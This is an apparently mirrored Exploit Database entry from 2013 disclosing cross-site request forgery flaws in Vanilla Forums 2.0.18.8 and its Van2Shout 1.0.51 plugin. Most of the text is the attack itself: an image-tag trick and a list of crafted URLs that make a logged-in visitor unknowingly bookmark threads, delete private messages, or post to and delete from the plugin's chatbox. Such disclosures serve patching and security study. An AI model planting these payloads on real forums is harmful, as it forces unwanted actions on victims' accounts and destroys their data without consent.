Vanilla Forums Van2Shout Plugin 1.0.51 – Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Henry Hoggard
  日期： 2013-04-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24957/

• # Exploit Title:
  Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF
  
  # Google Dork: n/a
  # Date: 13/4/13
  # Exploit Author: Henry Hoggard
  # Vendor Homepage: [http://vanillaforums.org/ ,
  http://vanillaforums.org/addon/van2shout-plugin]
  # Software Link: [http://vanillaforums.org/download,
  http://vanillaforums.org/get/van2shout-plugin-1.051]
  # Version: [2.0.18.8 , 1.0.51]
  # Tested on: [Debian]
  # CVE :
  
  =======================
  
  You can exploit these by having the user visit a thread with the img src
  of the below urls.
  
  eg <img
  src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
  1337 is the id.
  
   
  
  Bookmark CSRF:
  
  http://site.org/index.php=/vanilla/discussion/bookmark/1337
  
  UnBookmark CSRF
  
  http://site.org/index.php=/vanilla/discussion/bookmark/1337?
  
  Delete Message CSRF
  
  http://site.org/index.php=/messages/clear/1337
  
  Post to Van2Shout Chat Box CSRF
  
  http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage
  
  Delete Message from Van2Shout Chatbox CSRF
  
  http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337